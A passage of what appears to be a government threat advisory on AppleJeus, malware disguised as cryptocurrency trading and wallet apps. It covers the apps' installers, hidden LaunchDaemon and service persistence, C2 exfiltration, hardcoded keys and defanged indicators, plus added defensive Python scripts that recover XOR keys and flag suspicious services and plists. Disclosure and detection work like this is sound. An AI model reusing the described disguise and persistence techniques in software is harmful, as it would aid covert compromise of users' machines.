    Updater checks for the CheckUpdate parameter and, when found, it collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). This process helps the adversary obtain persistence on a victim’s network.

    The postinstall script is a sequence of instructions that runs after successfully installing an application (Command and Scripting Interpreter: Unix Shell [T1059.004]). This script moves the property list (plist) file .com.celastradepro.plist from the installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]). The leading “.” makes it unlisted in the Finder app or default Terminal directory listing (Hide Artifacts: Hidden Files and Directories [T1564.001]). Once in the folder, this plist file will launch the Updater program with the CheckUpdate parameter on system load as Root for every user. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches the Updater program with the CheckUpdate parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).

    Payload

    After a cybersecurity company published a report detailing the above programs and their malicious extras, the website was no longer accessible. Since this site was the C2 server, the payload cannot be confirmed. The cybersecurity company that published the report states the payload was an encrypted and obfuscated binary (Obfuscated Files or Information [T1027]), which eventually drops FALLCHILL onto the machine and installs it as a service (Create or Modify System Process: Windows Service [T1543.003]). FALLCHILL malware uses an RC4 encryption algorithm with a 16-byte key to protect its communications (Encrypted Channel: Symmetric Cryptography [T1573.001]).
    The key employed in these versions has also been used in a previous version of FALLCHILL.[5][6]

    For more details on AppleJeus Version 1: Celas Trade Pro, see MAR-10322463-1.v1.

    AppleJeus Version 2: JMT Trading

    Introduction and Infrastructure

    In October 2019, a cybersecurity company identified a new version of the AppleJeus malware—JMT Trading—thanks to its many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which a legitimate-looking company, called JMT Trading, marketed and distributed on their website, jmttrading[.]org (Acquire Infrastructure: Domain [T1583.001]). This website contained a “Download from GitHub” button, which linked to JMT Trading’s GitHub page (Acquire Infrastructure: Web Services [T1583.006]), where Windows and macOS X versions of the JMT Trader application were available for download (Develop Capabilities: Malware [T1587.001]). The GitHub page also included .zip and tar.gz files containing the source code.

    The jmttrading[.]org domain resolved to the following IP addresses from October 15, 2016, to January 22, 2021.
    - 45.33.2[.]79
    - 45.33.23[.]183
    - 45.56.79[.]23
    - 45.79.19[.]196
    - 96.126.123[.]244
    - 146.112.61[.]107
    - 184.168.221[.]40
    - 184.168.221[.]57
    - 198.187.29[.]20
    - 198.54.117[.]197
    - 198.54.117[.]198
    - 198.54.117[.]199
    - 198.54.117[.]200
    - 198.58.118[.]167

    The jmttrading[.]org domain had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak security verification level that does not require validation of the owner’s identity or the actual business’s existence. The current SSL certificate was issued by Let’s Encrypt.

    JMT Trading Application Analysis

    Windows Program

    The Windows version of the malicious cryptocurrency application is an MSI Installer. The installer looks legitimate and has a valid digital signature from Sectigo (Obtain Capabilities: Digital Certificates [T1588.004]).
    The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for jmttrading[.]org (Obtain Capabilities: Code Signing Certificates [T1588.003]). The MSI Installer asks the victim for administrative privileges to run (User Execution: Malicious File [T1204.002]). Once permission is granted, the MSI executes the following actions.
    - Installs JMTTrader.exe in folder C:\Program Files (x86)\JMTTrader
    - Installs CrashReporter.exe in folder C:\Users\<username>\AppData\Roaming\JMTTrader
    - Runs CrashReporter.exe with the Maintain parameter

    The JMTTrader.exe program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to CelasTradePro.exe and the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity.

    The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed “snowman” (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user’s login (Scheduled Task/Job: Scheduled Task [T1053.005]).

    macOS X Program

    The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.
    - Installs JMTTrader in folder /Applications/JMTTrader.app/Contents/MacOS/
    - Installs .CrashReporter in folder /Applications/JMTTrader.app/Contents/Resources/ (Note: the leading “.” makes it unlisted in the Finder app or default Terminal directory listing.)
    - Executes a postinstall script
    - Moves .com.jmttrading.plist to folder LaunchDaemons
    - Changes the file permissions on the plist
    - Runs CrashReporter with the Maintain parameter
    - Moves .CrashReporter to folder /Library/JMTTrader/CrashReporter
    - Makes .CrashReporter executable

    The JMTTrader program asks for the user’s exchange and loads a legitimate-looking cryptocurrency trading platform—very similar to CelasTradePro and the benign Q.T. Bitcoin Trader—that exhibits no signs of malicious activity.

    The CrashReporter program checks for the Maintain parameter and is not obfuscated. This lack of obfuscation makes it easier to determine the program’s functionality in detail. When it finds the Maintain parameter, it collects the victim’s host information (System Owner/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]).

    The postinstall script has similar functionality to the one used by CelasTradePro, but it has a few additional features (Command and Scripting Interpreter: Unix Shell [T1059.004]). It moves the property list (plist) file .com.jmttrading.plist from the Installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]), but also changes the file permissions on the plist file. Once in the folder, this plist file will launch the CrashReporter program with the Maintain parameter on system load as Root for every user. Also, the postinstall script moves the .CrashReporter program to a new location /Library/JMTTrader/CrashReporter and makes it executable.
    Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).

    Payload

    Soon after the cybersecurity company tweeted about JMT Trader on October 11, 2019, the files on GitHub were updated to clean, non-malicious installers. Then on October 13, 2019, a different cybersecurity company published an article detailing the macOS X JMT Trader, and soon after, the C2 beastgoc[.]com website went offline. There is not a confirmed sample of the payload to analyze at this point.

    For more details on AppleJeus Version 2: JMT Trading, see MAR-10322463-2.v1.

    AppleJeus Version 3: Union Crypto

    Introduction and Infrastructure

    In December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which was marketed and distributed by a legitimate-looking company, called Union Crypto, on their website, unioncrypto[.]vip (Acquire Infrastructure: Domain [T1583.001]). Although this website is no longer available, a cybersecurity researcher discovered a download link, https://www.unioncrypto[.]vip/download/W6c2dq8By7luMhCmya2v97YeN, recorded on VirusTotal for the macOS X version of UnionCryptoTrader. In contrast, open-source reporting stated that the Windows version might have been downloaded via the instant messaging service Telegram, as it was found in a “Telegram Downloads” folder on an unnamed victim.[7]

    The unioncrypto[.]vip domain resolved to the following IP addresses from June 5, 2019, to July 15, 2020.
    - 104.168.167[.]16
    - 198.54.117[.]197
    - 198.54.117[.]198
    - 198.54.117[.]199
    - 198.54.117[.]200

    The domain unioncrypto[.]vip had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]).
The SSL certificate was “Domain Control Validated,” a weak verification level that only proves control of the domain and does not require validation of the owner’s identity or of the business’s existence.

Union Crypto Trader Application Analysis

Windows Program

The Windows version of the malicious cryptocurrency application is a Windows executable (.exe) (User Execution: Malicious File [T1204.002]) that acts as an installer and extracts a temporary MSI Installer. The Windows program executes the following actions:
  • Extracts UnionCryptoTrader.msi to folder C:\Users\<username>\AppData\Local\Temp\{82E4B719-90F74BD1-9CF1-56CD777E0C42}
  • Runs UnionCryptoUpdater.msi
  • Installs UnionCryptoTrader.exe in folder C:\Program Files\UnionCryptoTrader
  • Installs UnionCryptoUpdater.exe in folder C:\Users\<username>\AppData\Local\UnionCryptoTrader
  • Deletes UnionCryptoUpdater.msi
  • Runs UnionCryptoUpdater.exe

The program UnionCryptoTrader.exe loads a legitimate-looking cryptocurrency arbitrage application (arbitrage being “the simultaneous buying and selling of securities, currency, or commodities in different markets or in derivative forms to take advantage of differing prices for the same asset”) that exhibits no signs of malicious activity. This application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.[8]

The program UnionCryptoUpdater.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]) that will start automatically when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it “Automatically installs updates for Union Crypto Trader.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in a string that is MD5 hashed and stored in the auth_signature variable before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]).
macOS X Program

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate, and the user is warned of that before installation. The installer executes the following actions:
  • Installs UnionCryptoTrader in folder /Applications/UnionCryptoTrader.app/Contents/MacOS/
  • Installs .unioncryptoupdater in folder /Applications/UnionCryptoTrader.app/Contents/Resources/ (Note: the leading “.” keeps the file out of Finder and out of a default Terminal directory listing.)
  • Executes a postinstall script
  • Moves .vip.unioncrypto.plist to folder LaunchDaemons
  • Changes the file permissions on the plist to Root
  • Runs unioncryptoupdater
  • Moves .unioncryptoupdater to folder /Library/UnionCrypto/unioncryptoupdater
  • Makes .unioncryptoupdater executable

The UnionCryptoTrader program loads a legitimate-looking cryptocurrency arbitrage application that exhibits no signs of malicious activity. The application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.

The .unioncryptoupdater program is signed ad hoc, meaning it is not signed with a valid code-signing identity. When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information in a string that is MD5 hashed and stored in the auth_signature variable before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]).

The postinstall script has similar functionality to the one used by JMT Trading (Command and Scripting Interpreter: Unix Shell [T1059.004]). It moves the property list (plist) file .vip.unioncrypto.plist from the Installer package to the LaunchDaemons folder (Scheduled Task/Job: Launchd [T1053.004]) and also changes the file permissions on the plist file to Root.
Once in that folder, the plist will launch .unioncryptoupdater as root on system load, for every user. The postinstall script moves the .unioncryptoupdater program to a new location, /Library/UnionCrypto/unioncryptoupdater, and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches .unioncryptoupdater and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).

Payload

The payload for the Windows malware is a Windows Dynamic-Link Library (DLL). UnionCryptoUpdater.exe does not download the stage 2 malware immediately but only after a delay specified by the C2 server. This delay may be intended to keep researchers from directly obtaining the stage 2 malware.

The macOS X malware’s payload could not be downloaded, as the C2 server is no longer accessible, and none of the open-source reporting for this sample contained copies of the macOS X payload. The macOS X payload is likely similar in functionality to the Windows stage 2 described above.

For more details on AppleJeus Version 3: Union Crypto, see MAR-10322463-3.v1.

Commonalities between Celas Trade Pro, JMT Trading, and Union Crypto

Hardcoded Values

In each AppleJeus version there are hardcoded values, used either for encryption or, when combined with the time, to create a signature (table 1).

Table 1: AppleJeus hardcoded values and uses

AppleJeus Version      | Value                     | Use
1: Celas Trade Pro     | Moz&Wie;#t/6T!2y          | XOR encryption to send data
1: Celas Trade Pro     | W29ab@ad%Df324V$Yd        | RC4 decryption
2: JMT Trader Windows  | X,%`PMk--Jj8s+6=15:20:11  | XOR encryption to send data
2: JMT Trader OSX      | X,%`PMk--Jj8s+6=\x02      | XOR encryption to send data
3: Union Crypto Trader | 12GWAPCT1F0I1S14          | Combined with time for signature

The Union Crypto Trader and Celas LLC (XOR) values are 16 bytes in length.
For JMT Trader, the first 16 bytes of the Windows and macOS X values are identical; the additional bytes in the Windows sample are in a time format. The same structure, a 16-byte value combined with the time, is used in Union Crypto Trader to create the auth_signature. As mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro, and all FALLCHILL samples use hardcoded 16-byte RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples.

Open-Source Cryptocurrency Applications

All three AppleJeus samples are bundled with modified copies of legitimate cryptocurrency applications and can be used as originally designed to trade cryptocurrency. Celas LLC and JMT Trader both modified the same application, Q.T. Bitcoin Trader; Union Crypto Trader modified the Blackbird Bitcoin Arbitrage application.

Postinstall Scripts, Property List Files, and LaunchDaemons

The macOS X samples of all three AppleJeus versions contain postinstall scripts with similar logic. The Celas LLC postinstall script only moves the plist file to a new location and launches Updater with the CheckUpdate parameter in the background. The JMT Trader and Union Crypto Trader scripts perform these same actions and are otherwise identical to each other; the additional actions both perform are to change the file permissions on the plist, create a new directory under /Library, move CrashReporter or UnionCryptoUpdater into that directory, and make it executable.

The plist files for all three AppleJeus versions have identical functionality; they differ only in file names and in one default comment that was not removed from the Celas LLC plist. Because the logic of the postinstall scripts and plist files is almost identical, the LaunchDaemons they create also function the same: all launch the secondary executable as root on system load, for every user.
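The hardcoded XOR keys in table 1 are worth a closer look from the defender's side: a repeating 16-byte key means that 16 bytes of known plaintext in a captured beacon recover the key, and the key then identifies the variant. The script below is an added example written for this page (it is not code from CISA, from the malware analysis reports, or from the malware itself). The keys are the XOR values from table 1; the beacon string, its field layout, and the assumption that a beacon begins with a fixed field name are constructed for the demonstration, since the advisory does not give the wire format. time_signature() is a hypothetical reconstruction of the "16-byte value combined with the time" pattern, and its concatenation order is an assumption.

```python
"""Repeating-key XOR as used by the AppleJeus exfiltration stubs (table 1).

Added example for this advisory; it is not code from CISA or from the malware.
The keys are the XOR values listed in table 1. The beacon string below, its
field layout, and the assumption that a beacon starts with a fixed field name
are constructed for the demonstration; the advisory does not give the wire
format. time_signature() is a hypothetical reconstruction of "16-byte value
combined with the time, MD5 hashed": the concatenation order is an assumption.
"""
import hashlib
from typing import List

# XOR keys from table 1. Both JMT Trader keys share their first 16 bytes;
# the Windows key carries extra bytes in a time-like format.
KNOWN_XOR_KEYS = {
    "Celas Trade Pro": b"Moz&Wie;#t/6T!2y",
    "JMT Trader (Windows)": b"X,%`PMk--Jj8s+6=15:20:11",
    "JMT Trader (macOS)": b"X,%`PMk--Jj8s+6=\x02",
}
KEY_LEN = 16  # the common key length the advisory points out

# Constructed host-information beacon (not the malware's real format).
SAMPLE_BEACON = b"hostname=MacBook-Pro;user=alice;os=10.15.7"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Encrypt or decrypt with a repeating key. XOR is its own inverse, so the
    same call both builds the exfil blob and recovers it from a capture."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def recover_key(ciphertext: bytes, known_prefix: bytes, key_len: int = KEY_LEN) -> bytes:
    """Recover the first key_len key bytes from a capture whose leading
    plaintext is known (a fixed field name, for example). For a repeating
    key this is enough to decrypt the whole message: key = ct XOR pt."""
    if len(known_prefix) < key_len or len(ciphertext) < key_len:
        raise ValueError(f"need at least {key_len} bytes of known plaintext and ciphertext")
    return bytes(c ^ p for c, p in zip(ciphertext[:key_len], known_prefix[:key_len]))


def attribute_beacon(ciphertext: bytes, known_prefix: bytes) -> List[str]:
    """Name every table 1 key whose first 16 bytes match the recovered key.
    Returns more than one name when keys share a prefix (the two JMT keys),
    which is why 16 bytes of known plaintext cannot separate them."""
    recovered = recover_key(ciphertext, known_prefix)
    return [name for name, key in KNOWN_XOR_KEYS.items() if key[:KEY_LEN] == recovered]


def time_signature(value: bytes, unix_time: int) -> str:
    """Hypothetical auth_signature: MD5 over the 16-byte value and the time.
    Assumption: value followed by the decimal time; the real field order is
    not given in the advisory. The point is that with the value hardcoded,
    anyone who knows it and the time can reproduce the signature."""
    return hashlib.md5(value + str(unix_time).encode()).hexdigest()


if __name__ == "__main__":
    blob = xor_repeating(SAMPLE_BEACON, KNOWN_XOR_KEYS["Celas Trade Pro"])
    print("exfil blob:", blob.hex())
    print("decrypted :", xor_repeating(blob, KNOWN_XOR_KEYS["Celas Trade Pro"]))
    print("attributed:", attribute_beacon(blob, b"hostname=MacBook-"))
```

Run against a real capture, the only input you need is the POST body and a guess at the first 16 plaintext bytes; if attribute_beacon() returns both JMT names, the extra bytes of the Windows key (bytes 17 onward) are what separates the two, exactly as the advisory notes.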
AppleJeus Version 4: Kupay Wallet

Introduction and Infrastructure

On March 13, 2020, a new version of the AppleJeus malware was identified. The malware was marketed and distributed by a legitimate-looking company called Kupay Wallet on its website, kupaywallet[.]com (Acquire Infrastructure: Domain [T1583.001]). The domain www.kupaywallet[.]com resolved to IP address 104.200.67[.]96 from March 20, 2020, to January 16, 2021. The IP address was controlled by CrownCloud US, LLC (autonomous system number [ASN] 8100), located in New York, NY. The domain www.kupaywallet[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]). The SSL certificate was “Domain Control Validated,” a weak verification level that only proves control of the domain and does not require validation of the owner’s identity or of the business’s existence.

Kupay Wallet Application Analysis

Windows Program

The Windows version of the malicious cryptocurrency application is an MSI Installer. The MSI executes the following actions:
  • Installs Kupay.exe in folder C:\Program Files (x86)\Kupay
  • Installs KupayUpgrade.exe in folder C:\Users\<username>\AppData\Roaming\KupaySupport
  • Runs KupayUpgrade.exe

The program Kupay.exe loads a legitimate-looking cryptocurrency wallet platform that exhibits no signs of malicious activity and is very similar to the open-source wallet Copay, distributed by the Atlanta-based company BitPay.

The program KupayUpgrade.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]) that will start automatically when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it is an “Automatic Kupay Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information into strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]).
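Every Windows variant in this advisory (Union Crypto, Kupay Wallet, CoinGoTrade, Dorusio) persists the same way: an "updater" binary dropped under the user's AppData folder registers itself as an auto-start service with a plausible description. A service whose binary lives in a user-writable profile path is unusual enough to hunt for directly. The script below is an added example written for this page, not CISA's code: it scores service records of the shape produced by `Get-CimInstance Win32_Service | Select-Object Name,DisplayName,Description,PathName,StartMode,StartName | ConvertTo-Json`. The records it ships with are constructed; the AppleJeus one uses the install path and service description the advisory gives for KupayUpgrade.exe, while its service name and account are assumptions, and the other two are ordinary services made up for contrast.

```python
"""Flag Windows services installed from user-writable profile paths.

Added example for this advisory; not code from CISA. It scores service records
of the shape produced by
  Get-CimInstance Win32_Service | Select-Object Name,DisplayName,Description,PathName,StartMode,StartName | ConvertTo-Json
The records below are constructed: the AppleJeus one uses the install path and
service description the advisory gives for KupayUpgrade.exe (service name and
account are assumptions); the other two are made-up benign services.
"""
import json
import re
from typing import Dict, List

# A binary under a user profile is writable by that user, which is not where
# an auto-start service binary belongs.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\", re.IGNORECASE)

# Service descriptions the advisory attributes to the AppleJeus updaters.
APPLEJEUS_DESCRIPTIONS = {
    "Automatically installs updates for Union Crypto Trader",
    "Automatic Kupay Upgrade",
    "Automatic CoinGoTrade Upgrade",
    "Automatic Dorusio Upgrade",
}

SAMPLE_SERVICES = [
    {   # constructed from the advisory's Kupay Wallet description
        "Name": "KupayUpgrade", "DisplayName": "Kupay Upgrade",
        "Description": "Automatic Kupay Upgrade",
        "PathName": r"C:\Users\alice\AppData\Roaming\KupaySupport\KupayUpgrade.exe",
        "StartMode": "Auto", "StartName": "LocalSystem",
    },
    {   # constructed benign service: unquoted path followed by arguments
        "Name": "Dnscache", "DisplayName": "DNS Client",
        "Description": "Resolves and caches DNS names.",
        "PathName": r"C:\WINDOWS\system32\svchost.exe -k NetworkService -p",
        "StartMode": "Auto", "StartName": r"NT AUTHORITY\NetworkService",
    },
    {   # constructed benign third-party service: quoted path with arguments
        "Name": "VendorAgent", "DisplayName": "Vendor Agent",
        "Description": "Vendor endpoint agent",
        "PathName": r'"C:\Program Files\Vendor Agent\agent.exe" --service',
        "StartMode": "Auto", "StartName": "LocalSystem",
    },
]


def binary_from_pathname(pathname: str) -> str:
    """Return just the executable from a PathName, dropping quotes and arguments."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return pathname[1:end] if end > 0 else pathname[1:]
    match = re.match(r"(.*?\.exe)", pathname, re.IGNORECASE)
    return match.group(1) if match else pathname.split(" ", 1)[0]


def audit_service(svc: dict) -> List[str]:
    """Reasons this service record looks like the AppleJeus updater pattern."""
    findings = []
    exe = binary_from_pathname(svc.get("PathName", ""))
    start_mode = svc.get("StartMode", "").lower()
    account = svc.get("StartName", "").lower()
    if USER_WRITABLE.search(exe):
        findings.append("binary under user-profile AppData")
        if start_mode == "auto" and account in ("localsystem", ""):
            findings.append("auto-start as LocalSystem from a user-writable path")
    if svc.get("Description", "") in APPLEJEUS_DESCRIPTIONS:
        findings.append("description matches an AppleJeus updater service")
    return findings


def audit_services(records: List[dict]) -> Dict[str, List[str]]:
    """Map service name -> findings, for services with at least one finding."""
    results = {}
    for svc in records:
        findings = audit_service(svc)
        if findings:
            results[svc.get("Name", "<unnamed>")] = findings
    return results


def audit_json(text: str) -> Dict[str, List[str]]:
    """Accept ConvertTo-Json output: an object for one service, an array for many."""
    data = json.loads(text)
    return audit_services(data if isinstance(data, list) else [data])


if __name__ == "__main__":
    for name, reasons in audit_services(SAMPLE_SERVICES).items():
        print(f"{name}: {'; '.join(reasons)}")
```

The AppData check is the one that generalizes: the description strings only catch the four variants named here, whereas an auto-start service running as LocalSystem out of a user-writable folder is a finding regardless of what the malware calls itself.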
macOS X Program

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate, and the user is warned of that before installation. The installer executes the following actions:
  • Installs Kupay in folder /Applications/Kupay.app/Contents/MacOS/
  • Installs kupay_upgrade in folder /Applications/Kupay.app/Contents/MacOS/
  • Executes a postinstall script
  • Creates the KupayDaemon folder in /Library/Application Support
  • Moves kupay_upgrade to the new folder
  • Moves com.kupay.pkg.wallet.plist to folder /Library/LaunchDaemons/
  • Runs the command launchctl load to load the plist without a restart
  • Runs kupay_upgrade in the background

Kupay is likely a copy of an open-source cryptocurrency wallet application; it loads a legitimate-looking, fully functional wallet program, and its functionality is identical to that of the Windows Kupay.exe program.

The kupay_upgrade program calls its function CheckUpdate (which contains most of the malware’s logic) and sends a POST to the C2 server with a connection named “Kupay Wallet 9.0.1 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/kupay_update with permissions set by the command chmod 700 (only the owner can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and kupay_upgrade returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]).

The postinstall script has similar functionality to the other AppleJeus scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]). It creates the KupayDaemon folder in /Library/Application Support and then moves kupay_upgrade to the new folder.
It moves the property list (plist) file com.kupay.pkg.wallet.plist from the Installer package to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). The script then runs the command launchctl load to load the plist without a restart (Command and Scripting Interpreter [T1059]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script also launches kupay_upgrade and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).

Payload

The Windows malware’s payload could not be downloaded, since the C2 server is no longer accessible, and none of the open-source reporting for this sample contained copies of the payload. The Windows payload is likely similar in functionality to the macOS X stage 2 described below.

The stage 2 payload for the macOS X malware was decoded and analyzed. It has a variety of functionality: most importantly, it checks in with a C2 and, once connected, can send or receive a payload, read and write files, execute commands via the terminal, and more.

For more details on AppleJeus Version 4: Kupay Wallet, see MAR-10322463-4.v1.

AppleJeus Version 5: CoinGoTrade

Introduction and Infrastructure

In early 2020, another version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called CoinGoTrade on its website, coingotrade[.]com (Acquire Infrastructure: Domain [T1583.001]). The domain CoinGoTrade[.]com resolved to IP address 198.54.114[.]175 from February 28, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA; it is in the same ASN as the IP addresses for Dorusio[.]com and Ants2Whale[.]com. The domain CoinGoTrade[.]com had a valid Sectigo SSL certificate (Obtain Capabilities: Digital Certificates [T1588.004]).
The SSL certificate was “Domain Control Validated,” a weak verification level that only proves control of the domain and does not require validation of the owner’s identity or of the business’s existence.

CoinGoTrade Application Analysis

Windows Program

The Windows version of the malicious application is an MSI Installer. The installer appears to be legitimate and executes the following actions:
  • Installs CoinGoTrade.exe in folder C:\Program Files (x86)\CoinGoTrade
  • Installs CoinGoTradeUpdate.exe in folder C:\Users\<username>\AppData\Roaming\CoinGoTradeSupport
  • Runs CoinGoTradeUpdate.exe

CoinGoTrade.exe loads a legitimate-looking cryptocurrency wallet platform with no signs of malicious activity and is a copy of an open-source cryptocurrency application.

CoinGoTradeUpdate.exe first installs itself as a service (Create or Modify System Process: Windows Service [T1543.003]) that will start automatically when any user logs on (Boot or Logon Autostart Execution [T1547]). The service is installed with a description stating it is an “Automatic CoinGoTrade Upgrade.” When launched, it collects the victim’s host information (System Owner/User Discovery [T1033]), combines the information into strings before exfiltration, and sends it to a C2 website (Exfiltration Over C2 Channel [T1041]).

macOS X Program

The macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate, and the user is warned of that before installation. The installer executes the following actions:
  • Installs CoinGoTrade in folder /Applications/CoinGoTrade.app/Contents/MacOS/
  • Installs CoinGoTradeUpgradeDaemon in folder /Applications/CoinGoTrade.app/Contents/MacOS/
  • Executes a postinstall script
  • Creates the CoinGoTradeService folder in /Library/Application Support
  • Moves CoinGoTradeUpgradeDaemon to the new folder
  • Moves com.coingotrade.pkg.product.plist to folder /Library/LaunchDaemons/
  • Runs CoinGoTradeUpgradeDaemon in the background

The CoinGoTrade program is likely a copy of an open-source cryptocurrency wallet application and loads a legitimate-looking, fully functional wallet program.

The CoinGoTradeUpgradeDaemon program calls its function CheckUpdate (which contains most of the malware’s logic) and sends a POST to the C2 server with a connection named “CoinGoTrade 1.0 (Check Update Osx)” (Application Layer Protocol: Web Protocols [T1071.001]). If the C2 server returns a file, it is decoded and written to the victim’s folder /private/tmp/updatecoingotrade with permissions set by the command chmod 700 (only the owner can read, write, and execute) (Command and Scripting Interpreter [T1059]). Stage 2 is then launched, and CoinGoTradeUpgradeDaemon returns to sleeping and checking in with the C2 server at predetermined intervals (Application Layer Protocol: Web Protocols [T1071.001]).

The postinstall script has similar functionality to the other scripts (Command and Scripting Interpreter: Unix Shell [T1059.004]). It installs CoinGoTrade and CoinGoTradeUpgradeDaemon in folder /Applications/CoinGoTrade.app/Contents/MacOS/ and moves the property list (plist) file com.coingotrade.pkg.product.plist to the /Library/LaunchDaemons/ folder (Scheduled Task/Job: Launchd [T1053.004]). Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CoinGoTradeUpgradeDaemon and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004]).
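The postinstall and LaunchDaemon sequence described above for CoinGoTrade is the same one JMT Trader, Union Crypto, Kupay Wallet, Dorusio and Ants2Whale use: a plist lands in /Library/LaunchDaemons (in two versions with a hidden dot-prefixed name) and launches a non-Apple binary as root at every boot. The script below is an added triage example written for this page, not code from CISA or from the malware. The advisory names the plist files and the secondary executables but does not reproduce the plist contents, so the keys used here (Label, Program, ProgramArguments, RunAtLoad) are the standard launchd.plist keys, the sample plists are constructed to match the paths the advisory gives, and the allowlist of expected daemon-binary locations is a local assumption to tune per fleet.

```python
"""Triage /Library/LaunchDaemons for the AppleJeus persistence pattern.

Added example for this advisory; not code from CISA or from the malware. The
advisory names the plist files and secondary executables but not the plist
contents, so the keys used here (Label, Program, ProgramArguments, RunAtLoad)
are the standard launchd.plist keys and the sample plists are constructed to
match the paths the advisory gives. EXPECTED_BINARY_PREFIXES is a local
allowlist assumption, not something the advisory states.
"""
import os
import plistlib
from typing import Dict, List

# plist file names the advisory lists for versions 2 through 7.
APPLEJEUS_PLIST_NAMES = {
    ".com.jmttrading.plist", ".vip.unioncrypto.plist",
    "com.kupay.pkg.wallet.plist", "com.coingotrade.pkg.product.plist",
    "com.dorusio.pkg.wallet.plist", "com.Ants2whale.pkg.wallet.plist",
}
# Where a daemon binary launched as root is normally expected to live
# (assumption: tune this to your fleet).
EXPECTED_BINARY_PREFIXES = ("/System/", "/usr/", "/Library/Apple/", "/Library/PrivilegedHelperTools/")


def program_path(plist: dict) -> str:
    """launchd takes the binary from Program, else from ProgramArguments[0]."""
    args = plist.get("ProgramArguments") or []
    return plist.get("Program") or (args[0] if args else "")


def audit_plist(filename: str, raw: bytes) -> List[str]:
    """Return the reasons a LaunchDaemon plist matches the AppleJeus pattern."""
    findings = []
    plist = plistlib.loads(raw)
    path = program_path(plist)
    if filename.startswith("."):
        findings.append("hidden plist filename (dot prefix)")
    if filename in APPLEJEUS_PLIST_NAMES:
        findings.append("plist name matches an AppleJeus indicator")
    if path.startswith("/Library/Application Support/"):
        findings.append("daemon binary under /Library/Application Support")
    if plist.get("RunAtLoad") and path and not path.startswith(EXPECTED_BINARY_PREFIXES):
        findings.append(f"runs as root at load from unexpected location: {path}")
    return findings


def audit_directory(directory: str = "/Library/LaunchDaemons") -> Dict[str, List[str]]:
    """Audit every plist in a directory. os.scandir returns dotfiles, which a
    plain ls (and Finder) would hide, so the hidden AppleJeus plists are seen."""
    results = {}
    with os.scandir(directory) as entries:
        for entry in entries:
            if entry.is_file() and entry.name.endswith(".plist"):
                with open(entry.path, "rb") as fh:
                    results[entry.name] = audit_plist(entry.name, fh.read())
    return results


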